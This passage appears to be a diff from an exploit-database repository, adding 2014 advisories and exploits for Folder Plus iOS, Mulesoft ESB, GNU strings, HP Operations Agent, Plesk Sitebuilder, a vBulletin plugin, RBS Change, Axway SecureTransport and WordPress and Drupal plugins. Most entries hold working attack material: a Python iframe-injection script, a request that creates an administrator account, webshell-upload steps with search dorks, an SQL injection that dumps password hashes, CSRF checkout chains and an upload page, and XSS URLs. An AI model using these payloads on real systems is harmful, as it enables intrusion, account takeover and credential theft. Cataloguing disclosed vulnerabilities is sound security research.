User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C]
Connection[keep-alive]
Response Header:
Content-Type[text/html]
Content-Length[3051]
Server[MHttpServer/1.0.0]
Reference(s):
afgetdir.ma
afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C
afupload.ma
afupload.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C
Solution - Fix & Patch:
=======================
To patch the vulnerability it is required to parse and encode the upload GET method request.
Restrict the input field of the p & filename value to prevent code execution in the main wifi interface.
Security Risk:
==============
The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 9.1)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com

241
platforms/ios/webapps/35083.txt Executable file
View file

@ -0,0 +1,241 @@
Document Title:
===============
Folder Plus v2.5.1 iOS - Persistent Item Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1348
Release Date:
=============
2014-10-24
Vulnerability Laboratory ID (VL-ID):
====================================
1348
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
The ability to use multi touch to quickly move between viewing and editing files is also very good if youre willing to utilize it. - Touch Reviews.
Folder Plus is an In-App Multitasking Capable File Manager/Viewer/Editor, with 3-Finger Swipes You Switch between Tasks of File Managing, Viewing,
Editing, etc QUICKLY.
(Copy of the Vendor Homepage: http://theverygames.com/folder-plus/ & https://itunes.apple.com/us/app/file-manager-folder-plus/id484856077 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation web vulnerability in the official The Very Games `Folder Plus` iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-10-24: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
The Very Games
Product: Folder Plus - iOS Mobile Web Application (Wifi) 2.5.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Folder Plus v2.5.1 iOS mobile application.
The issue allows an attacker to inject own script code as payload to the application-side of the vulnerable service function or module.
The vulnerability is located in the delete item message context of the wifi interface listing module. The issue allows remote attackers
to inject own persistent script codes by usage of the vulnerable create folder function. The attacker injects a script code payloads and
waits for a higher privileged delete of the item to execute the script codes. The execution of the injected script code occurs in the
delete message context to confirm to erase. The attack vector is persistent on the application-side and the request method to execute
is GET. The issue allows to stream persistent malicious script codes to the front site wifi root path.
The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Wifi Sharing
Vulnerable Function(s):
[+] Delete Item
Vulnerable Parameter(s):
[+] items name
Affected Module(s):
[+] Wifi Interface - Root Index
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with
low or medium user interaction. For security demonstration or to reproduce the issue follow the provided information and steps below to continue.
PoC: Folder Plus > THE VERY GAMES - Wifi UI Index
<tbody><tr style="height:32px"><td style="width:32px"></td><td>?????</td><td style="width:32px"></td></tr>
<tr style="height:66px" valign="top">
<td></td>
<td id="modal_body1" style="width:336px" align="left">Delete<div style="display: inline-block;"
class="horz_padding"></div><img src="/?action=extra&path=icons/iconFolder.png" style="width: 16px; height:
16px; vertical-align: text-top;"><div style="width: 4px;
display: inline-block;"></div> "><[PERSISTENT INJECTED SCRIPT CODE!]);"><div style="display: inline-block;" class="horz_padding"></div>?</td>?????
<td></td>
</tr>
<tr style="height:32px" valign="middle">
<td></td>
<td id="modal_body2" align="right"><a href="#"
class="toolbar_button"><div style="display: inline-block;">Cancel</div></a><div style="width: 16px; display: inline-block;"></div>
<a href="#" class="toolbar_button"><img style="vertical-align: text-top; display: inline;" src="/?action=extra&path=images/delete1.png">
<img style="vertical-align: text-top; display: none;" src="/?action=extra&path=images/delete2.png"><div style="width: 4px; display:
inline-block;"></div><div style="display: inline-block;">Delete</div></a></td>
<td></td>
</tr>
<tr style="height:20px">
<td></td>
<td></td>
<td align="center" valign="middle">
<div id="modal_body3"></div>
</td>
</tr>
</tbody>
--- PoC Session Logs [POST] ---
Status: 200[OK]
GET http://localhost/?action=directory&path=%3Ciframe%20src%3Dhttp://www.vulnerability-lab.com%3E Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[2] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Vary[Accept]
Content-Type[application/json]
Date[Tue, 21 Oct 2014 15:42:33 GMT]
Status: 200[OK]
GET http://localhost/?action=list Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[491] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[491]
Vary[Accept]
Content-Type[application/json]
Date[Tue, 21 Oct 2014 15:42:34 GMT]
Status: 200[OK]
GET http://localhost/[PERSISTENT INJECTED SCRIPT CODE!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Tue, 21 Oct 2014 15:42:36 GMT]
Reference(s):
http://localhost/?action=
http://localhost/?action=directory&path=
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction implementation and filter mechanism on new folder inputs.
After the restriction the input needs to be encoded or parsed to prevent the persistent script code execution in the delete function.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the delete item function is estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com

53
platforms/jsp/webapps/35079.txt Executable file
View file

@ -0,0 +1,53 @@
Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation ? Remote Code
Execution
Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to
create an administrator user due to a lack of permissions check in the
handler/securityService.rpc endpoint. The following HTTP request can be
made by any authenticated user, even those with a single role of Monitor.
POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1
Host: 192.168.0.22:8585
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0)
Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8/
Referer: http://192.168.0.22:8585/mmc-3.5.1/index.jsp
Content-Length: 503
Cookie: JSESSIONID=CEB49ED5E239CB7AB6B7C02DD83170A4;
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
7|0|15|http://192.168.0.22:8585/mmc-3.5.1/com.mulesoft.mmc.MMC/
|5192695B02944BAAB195B91AB3FDDA48|org.mule.galaxy.web.rpc.RemoteSecurityService|addUser|org.mule.galaxy.web.rpc.WUser/4112688705|java.lang.String/2004016611|
fdsafdsa@fdsafdsa.com
|java.util.ArrayList/4159755760|298e8098-ff3e-4d13-b37e-3f3d33193ed9|ed4cbe90-085d-4d44-976c-436eb1d78d16|ccd8aee7-30bb-42e1-8218-cfd9261c7af9|d63c1710-e811-4c3c-aeb6-e474742ac084|fdsa|notadmin|notpassword|1|2|3|4|2|5|6|5|7|8|4|6|9|6|10|6|11|6|12|0|13|0|0|14|15|
This request will create an administrator with all roles with a username
of notadmin and a password of notpassword. Many vectors of remote code
execution are available to an administrator. Not only can an administrator
deploy WAR applications, they can also evaluate arbitrary groovy scripts
via the web interface.
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

61
platforms/linux/dos/35081.txt Executable file
View file

@ -0,0 +1,61 @@
Many shell users, and certainly a lot of the people working in
computer forensics or other fields of information security, have a
habit of running /usr/bin/strings on binary files originating from the
Internet. Their understanding is that the tool simply scans the file
for runs of printable characters and dumps them to stdout - something
that is very unlikely to put you at any risk.
It is much less known that the Linux version of strings is an integral
part of GNU binutils, a suite of tools that specializes in the
manipulation of several dozen executable formats using a bundled
library called libbfd. Other well-known utilities in that suite
include objdump and readelf.
Perhaps simply by the virtue of being a part of that bundle, the
strings utility tries to leverage the common libbfd infrastructure to
detect supported executable formats and "optimize" the process by
extracting text only from specific sections of the file.
Unfortunately, the underlying library can be hardly described as safe:
a quick pass with afl [1] (and probably with any other competent
fuzzer) quickly reveals a range of troubling and likely exploitable
out-of-bounds crashes due to very limited range checking. In binutils
2.24, you can try:
$ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2
EDB Mirror: http://www.exploit-db.com/sploits/35081
...
$ strings strings-bfd-badptr2
Segmentation fault
...
strings[24479]: segfault at 4141416d ip 0807a4e7 sp bf80ca60 error 4
in strings[8048000+9a000]
...
while (--n_elt != 0)
if ((++idx)->shdr->bfd_section)
elf_sec_group (idx->shdr->bfd_section) = shdr->bfd_section;
...
(gdb) p idx->shdr
$1 = (Elf_Internal_Shdr *) 0x41414141
In other words, this code appears to first read and then write to an
arbitrary pointer (0x41414141) taken from the input file. Many Linux
distributions ship strings without ASLR, making potential attacks
easier and more reliable - a situation reminiscent of one of
CVE-2014-6277 in bash [2].
Interestingly, the problems with the utility aren't exactly new; Tavis
spotted the first signs of trouble in other parts of libbfd some nine
years ago [3].
In any case: the bottom line is that if you are used to running
strings on random files, or depend on any libbfd-based tools for
forensic purposes, you should probably change your habits. For strings
specifically, invoking it with the -a parameter seems to inhibit the
use of libbfd. Distro vendors may want to consider making the -a mode
default, too.
[1] Obligatory plug: http://code.google.com/p/american-fuzzy-lop/
[2] http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html
[3] https://bugs.gentoo.org/show_bug.cgi?id=91398

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45245/info
RDM Embedded is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. The issue affects the 'lm_tcp' service.
Successful exploits may allow an attacker to execute arbitrary code in the context of a user running an application that uses the affected library. Failed exploit attempts may crash the application, denying service to legitimate users.
The issue affects lm_tcp <= 9.0.0 0248.18.0.0; other versions may also be affected.
http://www.exploit-db.com/sploits/35062.zip

View file

@ -0,0 +1,89 @@
#!/usr/bin/python
# Exploit Title: HP Operations Agent / HP Communications Broker Remote XSS iFrame Injection
# Date: 10/16/2014
# Exploit Author: Matt Schmidt (Syph0n)
# Vendor Homepage: www.hp.com
# Version: HP Operations Manager/Operations Agent / OpenView Communications Broker < 11.14
# Tested on: Windows 7, SunOS, RHEL Linux
# CVE : CVE-2014-2647
#
# This script was written to exploit a remote cross-site scripting vulnerability in HP Communication Broker/ HP Operations Agent.
# This vulnerability is stored in nature until the connection is terminated as it adds the XSS string to the User Agent.
# Vulnerable page: /Hewlett-Packard/OpenView/BBC/status
# This Exploit injects a Hidden iFrame which can be used for Social Engineering attacks as a browser exploit or other malicious URL can be embedded.
#
# Vulnerability Discovered by: Matt Schmidt (Syph0n)
# Timeline:
# 07/07/2014 - Submitted Discovery to ZDI
# 07/08/2014 - ZDI decided not to accept this vulnerability and directed to HP SSRT.
# 07/12/2014 - Contacted HP SSRT
# 07/13/2014 - HP SSRT assigned Case SSRT101643
# 07/17/2014 - Submitted Discovery and PoC exploit code to HP SSRT
# 07/30/2014 - Followed up with HP
# 07/31/2014 - Response from HP Indicating they need more time for Engineering to look into the submission
# 08/13/2014 - Followed up with HP
# 08/13/2014 - Response from HP stating that this issue will be resolved in version OA 11.14
# 08/24/2014 - Followed up with HP on CVE Identified and Disclosure Date
# 08/31/2014 - Followed up with HP again as no response to previous email
# 09/04/2014 - Followed up with HP again as no response to previous two emails
# 09/14/2014 - Followed up with HP again as no response to previous three emails
# 09/16/2014 - HP Responded stating they where "sorting out various items concerning this issue"
# 10/01/2014 - Followed up with HP asking for Disclosure Date and CVE Identifier
# 10/06/2014 - HP Responded indicating a disclosure was due out the week of the 6th.
# 10/15/2014 - HP Issued the following Security Bulletin regarding this vulnerability - https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472444
# 10/15/2014 - CVE-2014-2647 Issued for this vulnerability
import argparse, socket, sys
# Define Help Menu
if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'):
print '\nUsage: ./exploit.py <TargetIP> <iFrame URL> [Port]\n'
print ' <TargetIP>: The Target IP Address'
print ' <iFrame URL>: Malicious URL that will be injected as a hidden iframe\n'
print 'Options:'
print ' [--port]: The port the HP Communications Broker is running on, default is 383'
sys.exit(1)
# Parse Arguments
parser = argparse.ArgumentParser()
parser.add_argument("TargetIP")
parser.add_argument("iFrameURL")
parser.add_argument("--port", type=int, default=383)
args = parser.parse_args()
# Define User Agent to be spoofed
agent = 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'
# Define Variables
host = args.TargetIP
port = args.port
iFrameURL = args.iFrameURL
def main():
# Malicious hidden iframe payload that takes input from args.iFrameURL and fake UserAgent from agent_list
payload = "GET /Hewlett-Packard/OpenView/BBC/status HTTP/1.1\r\nUser-Agent: <iframe height='0' width='0' style='visibility:hidden;display:none' src='"+iFrameURL+"'></iframe><a>"+ agent +"</a>\r\n\r\n"
# Create Socket and check connection to target.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Checking host: " +host+"\n"
try:
s.connect((host, int(port)))
except Exception as e:
print "[+] Error Connecting: ", e
exit()
print "[*] Sending payload to HP OpenView HTTP Communication host " +host+"\n"
# Keep connection alive
while payload != 'q':
s.send(payload.encode())
data = s.recv(1024)
print "[*] Payload Sent."
payload = raw_input("\n[+] Keeping Connection Open ([q]uit):")
return
if __name__ == '__main__':
main()

75
platforms/php/webapps/34593.txt Executable file
View file

@ -0,0 +1,75 @@
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder
# Author : alieye
# vendor : http://www.parallels.com/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
#
# Google Dork:
# inurl::2006/Sites ext:aspx
# inurl::2006 inurl:.ashx?mediaid
# intext:"© Copyright 2004-2007 SWsoft." ext:aspx
# inurl:Wizard/HostingPreview.aspx?SiteID
#
# Date: 23/07/2014
# os : windows server 2003
# poc video clip : http://alieye.persiangig.com/video/plesk.rar/download
#
# version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010
# version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1-bypass loginpage (all version)
http://victim.com:2006/login.aspx
change url path to http://victim.com:2006/wizard
---------------------------------------------------------
2-uploading shell via Live HTTP Headers(Copyright 2004-2010)
Tools Needed: Live HTTP Headers, Backdoor Shell
Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx
Step 2: Rename your shell to shell.asp.gif and start capturing data with
Live HTTP Headers
Step 3: Replay data with Live HTTP Headers -
Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"\r\n]
Step 5: go to shell path:
http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp
---------------------------------------------------------
3-Arbitrary File Download Vulnerability(all version)
You can download any file from your target
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename
example:
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config
---------------------------------------------------------
4-xss(all version)
you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx
goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :)
---------------------------------------------------------
5-not authentication for making a website(all version)
making malicious page and phishing page with these paths
http://victim.com:2006/Wizard/Pages.aspx
http://victim.com:2006/Wizard/Edit.aspx
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir
[#] Thanks To All cseye members and All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To Master of Persian Music: Hossein Alizadeh
[#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/
[#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

31
platforms/php/webapps/34717.txt Executable file
View file

@ -0,0 +1,31 @@
#Title: vBulletin Verify Email Before Registration Plugin - SQL Injection
#Date: September 19 2014
#Version: Any vBulletin 4.*.* version which has the plugin installed.
#Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164
#Author: Dave (FW/FG)
The vulnerability resides in the register_form_complete hook, and some
other hooks.
The POST/GET data is not sanitized before being used in queries.
SQL injection at:
http://example.com/register.php?so=1&emailcode=[sqli]
PoC:
http://example.com/register.php?so=1&emailcode=1' UNION SELECT null,
concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM
user WHERE userid = '1
Now look at the source of the page and find:
<input type="text" style="display: none" name="email" id="email"
maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
<input type="text" style="display: none" name="emailconfirm" id="email"
maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
Vulnerable hooks:
profile_updatepassword_complete (Email field when you want to change
your email address after being logged in.)
register_addmember_complete (After submitting the final registration form.)
register_addmember_process
register_form_complete (This example)
register_start (Email confirmation form at register.php)

47
platforms/php/webapps/34965.txt Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: RBS Change Complet Open Source multiple CSRF vulnerabilities POST and GET
# Date: 10/10/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://www.rbschange.fr/
# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html
# Version: 3.6.8
# Tested on: Chrome, Firefox
DESCRIPTION
===========
Multiple CSRF vulnerabilities into RBS CHange Complet Open Source CMS which allow an attacker to tricks a regular logged in user by executing basket related commands like adding a product to the basket, setting a new shipping address, setting delivery mode, confirm basket and in some case confirm payment (tested with payment by check), ...
These tricks can be done by an HTML POST form or by a simple GET request (a link that the victims click on, an image that the victims see, ...).
HOW TO
======
First, the attacker need to know some paramaters as shopId, productId and other forms variables wich may differ regard to the CMS installation. It's not very difficult, he just need to register an account and look for a product then pick the differents variables by inspecting the HTML code.
He need to look for all the checkout process urls wich can differ on all RBS Change installation (due to urls rewritting).
In these examples we use the demo.rbschange.fr website wich is the demonstration site of the CMS.
Text marked [VAR] need to be modified by the attacker and may need HTML code inspection.
- Add to basket: /fr/action/order/AddToCart?quantity=1&shopId=SHOPID&productId=PRODUCTID
- Checkout: /fr/website/Mon-panier,13494.html?orderParam[website_BlockAction_submit][cartb_9][Order]="Je commande" GET OK
- Setting the shipping address: /fr/website/Commande-Adresse,13502.html?orderParam[billing-registered]=15&orderParam[billing-firstname]=[VICTIMFIRSTNAME]&orderParam[billing-lastname]=[VICTIMLASTNAME]&orderParam[billing-addressline1]="[VICTIMSTREET]"&orderParam[billing-zipcode]=[VICTIMZIPCODE]&orderParam[billing-city]=[VICTIMCITY]&orderParam[billing-country]=[COUNTRYCODE]&orderParam[shipping-usesameaddress]=0&orderParam[shipping-registered]=15&orderParam[shipping-firstname]=Krusty&orderParam[shipping-lastname]=Hack&orderParam[shipping-addressline1]="15, rue du oui"&orderParam[shipping-zipcode]=75000&orderParam[shipping-city]=Paris&orderParam[shipping-country]=[COUNTRYCODE]&orderParam[submited]=99k&orderParam[website_BlockAction_submit][stdAddressStepb_9][nextStep]="Continuer la commande"
- Setting delivery mode: /fr/website/Commande-Livraison,13503.html?orderParam[shippingFilterId]=[SHIPPINGFILTERID]&orderParam[website_BlockAction_submit][stdShippingStepb_9][nextStep]="Continuer la commande"
- Setting payment method: http://demo.rbschange.fr/fr/website/Commande-Paiement.html?orderParam[paymentFilterId]=[PAYMENTFILTERID]&orderParam[website_BlockAction_submit][stdBillingStepb_9][nextStep]="Continuer la commande"
- Confirm payment (here it's a payment by check): http://demo.rbschange.fr/fr/action/payment/BankResponseCheque?accept=1&paymentParam%5Baccept%5D=1
- And it's done. All the checkout process was done.
Warning: nextStep (e.g: orderParam[website_BlockAction_submit][stdBillingStepb_9][nextStep]="Continuer la commande") variables may differ according to the language used into the website. HTML code inspection again ! :)
WHY
===
All the forms doesn't use neither proper verification of HTTP request origin nor CSRF token. And all forms allow both GET and POST request.

57
platforms/php/webapps/35046.txt Executable file
View file

@ -0,0 +1,57 @@
<!--
# Exploit Title: Axway Secure Transport 5.1 SP2 Arbitary File Upload via CSRF
# Exploit author: Emmanuel Law
# Public Disclosure Date : 20/10/14
# Vendor homepage: http://www.axway.com
# Affected Software version: Axway Secure Transport 5.2.1 SP2 and possibly earlier versions.
# CVE: CVE-2013-7057
Software Description:
=====================
Axway SecureTransport is a multi-protocol Managed File Transfer (MFT) gateway solution that enables organizations to secure, manage, and track the transfer of files inside and outside the enterprise firewall.
Vulnerability Description:
=====================
It is possible to conduct CSRF on a user to upload arbitary files on the Axway Secure Transport server. This is due to the lack of anti-CSRF tokens in the web API. An adversary may exploit this to upload webshells for further attacks.
Vulnerability Disclosure Timeline:
==================================
12/12/13 - Discovered vulnerability and notified Vendor
17/10/14 - Verified with Vendor that a patch has been released.
20/10/14 - Public disclosure
Steps to reproduce / PoC:
=========================
-->
<html>
<!-- CSRF PoC to upload file to sftp.example.org- -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://sftp.example.org/api/v1.0/files/", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------19278872527677784281970288330");
xhr.withCredentials = true;
var body = "-----------------------------19278872527677784281970288330\r\n" +
"Content-Disposition: form-data; name=\"upload[]\"; filename=\"AURA_TEST.randomExtension\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"FILEDATA\r\n" +
"-----------------------------19278872527677784281970288330--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45266/info
The Processing Embed plugin for Wordpress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WordPress Processing Embed plugin 0.5 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/wordpress-processing-embed/data/popup.php?pluginurl=%3Cscript%3Ealert(0)%3C/script%3E

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45267/info
The Safe Search plugin for Wordpress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Safe Search 0.7 is vulnerable; other versions may also be affected. 2010-12-08
http://www.example.com/wordpress/wp-content/plugins/wp-safe-search/wp-safe-search-jx.php?v1=%3Cscript%3Ealert(0)%3C/script%3E

37
platforms/php/webapps/35072.txt Executable file
View file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/45276/info
The Embedded Media Field, Media: Video Flotsam, and Media: Audio Flotsam modules for Drupal are prone to multiple remote vulnerabilities, including:
1. An HTML-injection vulnerability
2. An arbitrary-file-upload vulnerability.
An attacker could exploit these vulnerabilities to execute arbitrary script code in a user's browser in the context of the affected site or execute arbitrary code on the server.
The following products and versions are affected:
